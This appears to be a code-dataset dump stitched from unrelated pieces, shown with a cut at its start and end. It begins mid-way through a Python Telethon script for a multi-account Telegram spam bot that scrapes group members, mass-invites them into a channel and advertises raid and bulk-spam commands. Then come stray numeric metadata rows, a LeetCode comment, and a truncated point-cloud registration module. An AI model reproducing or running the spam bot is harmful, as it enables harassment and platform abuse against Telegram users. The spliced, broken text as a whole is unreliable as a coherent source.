pattern=r"\*add"))<br/>@hdk.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@sdk.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@adk.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@bdk.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@cdk.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@edk.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@ddk.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@vkk.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@kkk.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@lkk.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@mkk.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@sid.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@shy.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@aan.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@ake.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@eel.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@khu.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@shi.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@yaa.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@dav.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@raj.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@put.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@eag.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@gle.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@wal.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@aaa.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@boy.on(events.NewMessage(incoming=True, pattern=r"\*add"))<div></div><br/>async def get_users(event):<br/> sender = await event.get_sender()<br/> me = await event.client.get_me()<br/> if not sender.id == me.id:<br/> mafia = await event.edit(f"`processing...`")<br/> else:<br/> h1m4n5hu0p = await get_chatinfo(event)<br/> chat = await event.get_chat()<br/> <br/> if event.is_private:<br/> return await event.edit("`Sorry, Cant add users here`")<br/> s = 0<br/> f = 0<br/> error = "None"<div></div> await event.edit("**TerminalStatus**\n\n`Collecting Users.......`")<br/> async for user in event.client.iter_participants(h1m4n5hu0p.full_chat.id):<br/> try:<br/> if error.startswith("Too"):<br/> return await event.edit(<br/> f"**Terminal Finished With Error**\n(`May Got Limit Error from telethon Please try agin Later`)\n**Error** : \n`{error}`\n\n• Invited `{s}` people \n• Failed to Invite `{f}` people"<br/> )<br/> await event.client(<br/> functions.channels.InviteToChannelRequest(channel=chat, users=[user.id])<br/> )<br/> s = s + 1<br/> await event.edit(<br/> f"**Terminal Running...**\n\n• Invited `{s}` people \n• Failed to Invite `{f}` people\n\n**× LastError:** `{error}`"<br/> )<br/> except Exception as e:<br/> error = str(e)<br/> f = f + 1<br/> return await event.edit(<br/> f"**Terminal Finished** \n\n• Successfully Invited `{s}` people \n• failed to invite `{f}` people"<br/> )<div></div><div></div><div></div><div></div><div></div>@idk.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@ydk.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@wdk.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@hdk.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@sdk.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@adk.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@bdk.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@cdk.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@edk.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@ddk.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@vkk.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@kkk.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@lkk.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@mkk.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@sid.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@shy.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@aan.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@ake.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@eel.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@khu.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@shi.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@yaa.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@dav.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@raj.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@put.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@eag.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@gle.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@wal.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@aaa.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@boy.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<div></div>async def ping(e):<br/> if e.sender_id in SMEX_USERS:<br/> start = datetime.now()<br/> text = "𝐀𝐑𝐊𝐇𝐀𝐌𝐱𝐆𝐎𝐃 𝐒𝐏𝐀𝐌𝐁𝐎𝐓 𝐎𝐏 🥵🔥!"<br/> event = await e.reply(text, parse_mode=None, link_preview=None )<br/> end = datetime.now()<br/> ms = (end-start).microseconds / 1000<br/> await event.edit(f"𝗣𝗢𝗡𝗚!\n`{ms}` ms{ALIVE_NAME} ")<div></div><div></div> <br/> <div></div>@idk.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@ydk.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@wdk.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@hdk.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@sdk.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@adk.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@bdk.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@cdk.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@edk.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@ddk.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@vkk.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@kkk.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@lkk.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@mkk.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@sid.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@shy.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@aan.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@ake.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@eel.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@khu.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@shi.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@yaa.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@dav.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@raj.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@put.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@eag.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@gle.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@wal.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@aaa.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@boy.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>async def restart(e):<br/> if e.sender_id in SMEX_USERS:<br/> text = "2𝐌𝐈𝐍 𝐖𝐀𝐈𝐓 𝐏𝐑𝐎 𝐁𝐎𝐓 𝐑𝐄𝐁𝐎𝐎𝐓𝐈𝐍𝐆...\n\nNow Wait Till Piro Bot Is Rebooting..."<br/> await e.reply(text, parse_mode=None, link_preview=None )<br/> try:<br/> await idk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await ydk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await wdk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await hdk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await sdk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await adk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await bdk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await cdk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await ddk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await edk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await vkk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await kkk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await lkk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await mkk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await sid.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await shy.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await aan.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await ake.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await eel.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await khu.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await shi.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await yaa.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await dav.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await raj.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await put.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await eag.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await gle.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await wal.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await aaa.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await boy.disconnect()<br/> except Exception as e:<br/> pass<br/> os.execl(sys.executable, sys.executable, *sys.argv)<br/> quit()<div></div> <br/> <br/> <br/> <br/> <br/>@idk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@ydk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@wdk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@hdk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@sdk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@adk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@bdk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@cdk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@edk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@ddk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@vkk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@kkk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@lkk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@mkk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@sid.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@shy.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@aan.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@ake.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@eel.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@khu.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@shi.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@yaa.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@dav.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@raj.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@put.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@eag.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@gle.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@wal.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@aaa.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@boy.on(events.NewMessage(incoming=True, pattern=r"\*help"))<div></div>async def help(e):<br/> if e.sender_id in SMEX_USERS:<br/> text = "⛓𝗔𝘃𝗮𝗶𝗹𝗮𝗯𝗹𝗲 𝗖𝗼𝗺𝗺𝗮𝗻𝗱𝘀⛓\n\n⚜𝙐𝙩𝙞𝙡𝙨 𝘾𝙤𝙢𝙢𝙖𝙣𝙙⚜:\n*ping\n*restart\n\n🔰𝙐𝙨𝙚𝙧𝙗𝙤𝙩 𝘾𝙤𝙢𝙢𝙖𝙣𝙙🔰:\n*join\n*pjoin\n*leave\n\n🛡𝙎𝙥𝙖𝙢 𝘾𝙤𝙢𝙢𝙖𝙣𝙙🛡:\n*delayspam\n*bigspam\n*raid\n*replyraid\n*dreplyraid\n\n\nIf You Dont Understand How To Use This Bot Then Dont Use Your Noob Mind Just Contact @YashOP_XD"<br/> await e.reply(text, parse_mode=None, link_preview=None )<div></div> <div></div> <br/> <br/>text = """<div></div>💥💥 𝘼𝙍𝙆𝙃𝘼𝙈𝙭𝙂𝙊𝘿 𝙎𝙋𝘼𝙈 𝘽𝙊𝙏 💥💥💥<br/>💥 𝐁𝐎𝐓 𝐁𝐘 𝐘𝐀𝐒𝐇 𝐀𝐍𝐃 𝐋𝐔𝐂𝐈𝐅𝐄𝐑 💥"""<div></div>print(text)<br/>print("")<br/>print("𝗔𝗥𝗞𝗛𝗔𝗠𝘅𝗚𝗢𝗗 𝗦𝗣𝗔𝗠 𝗕𝗢𝗧 𝗥𝗘𝗔𝗗𝗬 𝗙𝗢𝗥 𝗨𝗦𝗘 𝗖𝗛𝗘𝗖𝗞 𝗕𝗬 𝗗𝗢𝗜𝗡𝗚 *ping")<br/>if len(sys.argv) not in (1, 3, 4):<br/> try:<br/> idk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> ydk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> wdk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> hdk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> sdk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> adk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> bdk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> cdk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> edk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> ddk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> vkk.disconnect()<br/> except Exception as e:<br/> pass <br/> try:<br/> kkk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> lkk.disconnect()<br/> except Exception as e:<br/> pass <br/> try:<br/> mkk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> sid.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> shy.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> aan.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> ake.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> eel.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> khu.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> shi.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> yaa.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> dav.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> raj.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> put.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> eag.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> gle.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> wal.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> aaa.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> boy.disconnect()<br/> except Exception as e:<br/> pass<br/>else:<br/> try:<br/> idk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> ydk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> wdk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> hdk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> sdk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> adk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> bdk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> cdk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> edk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> ddk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> vkk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> kkk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> lkk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> mkk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> sid.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> shy.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> aan.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> ake.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> eel.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> khu.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> shi.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> yaa.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> dav.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> raj.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> put.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> eag.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> gle.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> wal.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> aaa.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> boy.run_until_disconnected()<br/> except Exception as e:<br/> pass<div></div></div>
| 94,575
| 94,575
| 0.614835
| 12,675
| 94,575
| 4.536805
| 0.03574
| 0.058431
| 0.131469
| 0.1899
| 0.886512
| 0.871018
| 0.866514
| 0.813109
| 0.809944
| 0.452682
| 0
| 0.004831
| 0.19244
| 94,575
| 1
| 94,575
| 94,575
| 0.747771
| 0
| 0
| 0
| 0
| 12
| 0.098281
| 0.005731
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 1
| 1
| null | null | 1
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 1
|
0
| 14
|
98196d2ec072930b4a547640c3df78bc65f90ec2
| 87
|
py
|
Python
|
AlgorithmProblems/0152. Maximum Product Subarray/main0152.py
|
lynnli92/leetcode-group-solution
|
b497eaf29fb820648366b44e27c918503936b167
|
[
"MIT"
] | 4
|
2021-12-31T00:53:32.000Z
|
2022-01-22T21:28:46.000Z
|
AlgorithmProblems/0152. Maximum Product Subarray/main0152.py
|
lynnli92/leetcode-group-solution
|
b497eaf29fb820648366b44e27c918503936b167
|
[
"MIT"
] | 1
|
2021-12-31T00:40:34.000Z
|
2021-12-31T00:40:34.000Z
|
AlgorithmProblems/0152. Maximum Product Subarray/main0152.py
|
lynnli92/leetcode-group-solution
|
b497eaf29fb820648366b44e27c918503936b167
|
[
"MIT"
] | 5
|
2021-12-31T00:28:40.000Z
|
2022-03-22T21:01:40.000Z
|
'''
nums: [2, 3, -2, 4]
max: [2, 6, -2, 4]
min: [2, 3, -12, -48]
max: [2, 6, 6, 6]
'''
| 14.5
| 21
| 0.356322
| 20
| 87
| 1.55
| 0.45
| 0.129032
| 0.322581
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.276923
| 0.252874
| 87
| 6
| 22
| 14.5
| 0.2
| 0.908046
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 1
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e251854943bc7f122a17c9dea4b676372614f592
| 20,790
|
py
|
Python
|
autolab_core/point_registration.py
|
shivamvats/autolab_core
|
cda081d2e07e3fe6cc9f3e8c86eea92330910d20
|
[
"Apache-2.0"
] | 68
|
2017-07-02T22:14:47.000Z
|
2022-03-30T19:09:37.000Z
|
autolab_core/point_registration.py
|
shivamvats/autolab_core
|
cda081d2e07e3fe6cc9f3e8c86eea92330910d20
|
[
"Apache-2.0"
] | 14
|
2017-06-29T18:27:12.000Z
|
2022-02-02T20:59:02.000Z
|
autolab_core/point_registration.py
|
shivamvats/autolab_core
|
cda081d2e07e3fe6cc9f3e8c86eea92330910d20
|
[
"Apache-2.0"
] | 35
|
2017-07-17T01:44:59.000Z
|
2022-03-30T19:09:28.000Z
|
"""
Classes for point set registration using variants of Iterated-Closest Point
Author: Jeff Mahler
"""
from abc import ABCMeta, abstractmethod
import logging
import numpy as np
from .feature_matcher import PointToPlaneFeatureMatcher
from .points import PointCloud, NormalCloud
from .rigid_transformations import RigidTransform
from .utils import skew
class RegistrationResult(object):
"""Struct to hold results of point set registration.
Attributes
----------
T_source_target : :obj:`autolab_core.RigidTranform`
transformation from source to target frame
cost : float
numeric value of the registration objective for the given transform
"""
def __init__(self, T_source_target, cost):
self.T_source_target = T_source_target
self.cost = cost
class IterativeRegistrationSolver:
"""Abstract class for iterative registration solvers."""
__metaclass__ = ABCMeta
@abstractmethod
def register(
self,
source_point_cloud,
target_point_cloud,
source_normal_cloud,
target_normal_cloud,
matcher,
num_iterations=1,
compute_total_cost=True,
match_centroids=False,
vis=False,
):
"""Iteratively register objects to one another.
Parameters
----------
source_point_cloud : :obj:`autolab_core.PointCloud`
source object points
target_point_cloud : :obj`autolab_core.PointCloud`
target object points
source_normal_cloud : :obj:`autolab_core.NormalCloud`
source object outward-pointing normals
target_normal_cloud : :obj:`autolab_core.NormalCloud`
target object outward-pointing normals
matcher : :obj:`PointToPlaneFeatureMatcher`
object to match the point sets
num_iterations : int
the number of iterations to run
compute_total_cost : bool
whether or not to compute the total cost upon termination.
match_centroids : bool
whether or not to match the centroids of the point clouds
Returns
-------
:obj`RegistrationResult`
results containing source to target transformation and cost
"""
pass
class PointToPlaneICPSolver(IterativeRegistrationSolver):
"""Performs Iterated Closest Point with an objective weighted between
point-to-point and point-to-plane.
Attributes
----------
sample_size : int
number of randomly sampled points to use per iteration
cost_sample_size : int
number of randomly sampled points to use for cost evaluations
gamma : float
weight of point-to-point objective relative to point-to-plane objective
mu : float
regularizer for matrix inversion in the Gauss-Newton step
"""
def __init__(
self, sample_size=100, cost_sample_size=100, gamma=100.0, mu=1e-2
):
self.sample_size_ = sample_size
self.cost_sample_size_ = cost_sample_size
self.gamma_ = gamma
self.mu_ = mu
IterativeRegistrationSolver.__init__(self)
def register(
self,
source_point_cloud,
target_point_cloud,
source_normal_cloud,
target_normal_cloud,
matcher,
num_iterations=1,
compute_total_cost=True,
match_centroids=False,
vis=False,
):
"""
Iteratively register objects to one another using a modified version
of point to plane ICP. The cost func is PointToPlane_COST +
gamma * PointToPoint_COST. Uses a `stochastic Gauss-Newton step`
where on each iteration a smaller number of points is sampled.
Parameters
----------
source_point_cloud : :obj:`autolab_core.PointCloud`
source object points
target_point_cloud : :obj`autolab_core.PointCloud`
target object points
source_normal_cloud : :obj:`autolab_core.NormalCloud`
source object outward-pointing normals
target_normal_cloud : :obj:`autolab_core.NormalCloud`
target object outward-pointing normals
matcher : :obj:`PointToPlaneFeatureMatcher`
object to match the point sets
num_iterations : int
the number of iterations to run
compute_total_cost : bool
whether or not to compute the total cost upon termination.
match_centroids : bool
whether or not to match the centroids of the point clouds
Returns
-------
:obj`RegistrationResult`
results containing source to target transformation and cost
"""
# check valid data
if not isinstance(source_point_cloud, PointCloud) or not isinstance(
target_point_cloud, PointCloud
):
raise ValueError(
"Source and target point clouds must be PointCloud objects"
)
if not isinstance(source_normal_cloud, NormalCloud) or not isinstance(
target_normal_cloud, NormalCloud
):
raise ValueError(
"Source and target normal clouds must be NormalCloud objects"
)
if not isinstance(matcher, PointToPlaneFeatureMatcher):
raise ValueError(
"Feature matcher must be a PointToPlaneFeatureMatcher object"
)
if (
source_point_cloud.num_points != source_normal_cloud.num_points
or target_point_cloud.num_points != target_normal_cloud.num_points
):
raise ValueError(
"Input point clouds must have the same number of points \
as corresponding normal cloud"
)
# extract source and target point and normal data arrays
orig_source_points = source_point_cloud.data.T
orig_target_points = target_point_cloud.data.T
orig_source_normals = source_normal_cloud.data.T
orig_target_normals = target_normal_cloud.data.T
# setup the problem
normal_norms = np.linalg.norm(orig_target_normals, axis=1)
valid_inds = np.nonzero(normal_norms)
orig_target_points = orig_target_points[valid_inds[0], :]
orig_target_normals = orig_target_normals[valid_inds[0], :]
normal_norms = np.linalg.norm(orig_source_normals, axis=1)
valid_inds = np.nonzero(normal_norms)
orig_source_points = orig_source_points[valid_inds[0], :]
orig_source_normals = orig_source_normals[valid_inds[0], :]
# alloc buffers for solutions
source_mean_point = np.mean(orig_source_points, axis=0)
target_mean_point = np.mean(orig_target_points, axis=0)
R_sol = np.eye(3)
t_sol = np.zeros([3, 1]) # init with diff between means
if match_centroids:
t_sol[:, 0] = target_mean_point - source_mean_point
# iterate through
for i in range(num_iterations):
logging.info("Point to plane ICP iteration %d" % (i))
# subsample points
source_subsample_inds = np.random.choice(
orig_source_points.shape[0], size=self.sample_size_
)
source_points = orig_source_points[source_subsample_inds, :]
source_normals = orig_source_normals[source_subsample_inds, :]
target_subsample_inds = np.random.choice(
orig_target_points.shape[0], size=self.sample_size_
)
target_points = orig_target_points[target_subsample_inds, :]
target_normals = orig_target_normals[target_subsample_inds, :]
# transform source points
source_points = (
R_sol.dot(source_points.T)
+ np.tile(t_sol, [1, source_points.shape[0]])
).T
source_normals = (R_sol.dot(source_normals.T)).T
# closest points
corrs = matcher.match(
source_points, target_points, source_normals, target_normals
)
# solve optimal rotation + translation
valid_corrs = np.where(corrs.index_map != -1)[0]
source_corr_points = corrs.source_points[valid_corrs, :]
target_corr_points = corrs.target_points[
corrs.index_map[valid_corrs], :
]
target_corr_normals = corrs.target_normals[
corrs.index_map[valid_corrs], :
]
num_corrs = valid_corrs.shape[0]
if num_corrs == 0:
logging.warning("No correspondences found")
break
# create A and b matrices for Gauss-Newton step on joint cost
# function
A = np.zeros([6, 6])
b = np.zeros([6, 1])
Ap = np.zeros([6, 6])
bp = np.zeros([6, 1])
G = np.zeros([3, 6])
G[:, 3:] = np.eye(3)
for i in range(num_corrs):
s = source_corr_points[i : i + 1, :].T
t = target_corr_points[i : i + 1, :].T
n = target_corr_normals[i : i + 1, :].T
G[:, :3] = skew(s).T
A += G.T.dot(n).dot(n.T).dot(G)
b += G.T.dot(n).dot(n.T).dot(t - s)
Ap += G.T.dot(G)
bp += G.T.dot(t - s)
v = np.linalg.solve(
A + self.gamma_ * Ap + self.mu_ * np.eye(6),
b + self.gamma_ * bp,
)
# create pose values from the solution
R = np.eye(3)
R = R + skew(v[:3])
U, S, V = np.linalg.svd(R.astype(np.float))
R = U.dot(V)
t = v[3:]
# incrementally update the final transform
R_sol = R.dot(R_sol)
t_sol = R.dot(t_sol) + t
T_source_target = RigidTransform(
R_sol,
t_sol,
from_frame=source_point_cloud.frame,
to_frame=target_point_cloud.frame,
)
total_cost = 0
source_points = (
R_sol.dot(orig_source_points.T)
+ np.tile(t_sol, [1, orig_source_points.shape[0]])
).T
source_normals = (R_sol.dot(orig_source_normals.T)).T
if compute_total_cost:
# rematch all points to get the final cost
corrs = matcher.match(
source_points,
orig_target_points,
source_normals,
orig_target_normals,
)
valid_corrs = np.where(corrs.index_map != -1)[0]
num_corrs = valid_corrs.shape[0]
if num_corrs == 0:
return RegistrationResult(T_source_target, np.inf)
# get the corresponding points
source_corr_points = corrs.source_points[valid_corrs, :]
target_corr_points = corrs.target_points[
corrs.index_map[valid_corrs], :
]
target_corr_normals = corrs.target_normals[
corrs.index_map[valid_corrs], :
]
# determine total cost
source_target_alignment = np.diag(
(source_corr_points - target_corr_points).dot(
target_corr_normals.T
)
)
point_plane_cost = (1.0 / num_corrs) * np.sum(
source_target_alignment * source_target_alignment
)
point_dist_cost = (1.0 / num_corrs) * np.sum(
np.linalg.norm(source_corr_points - target_corr_points, axis=1)
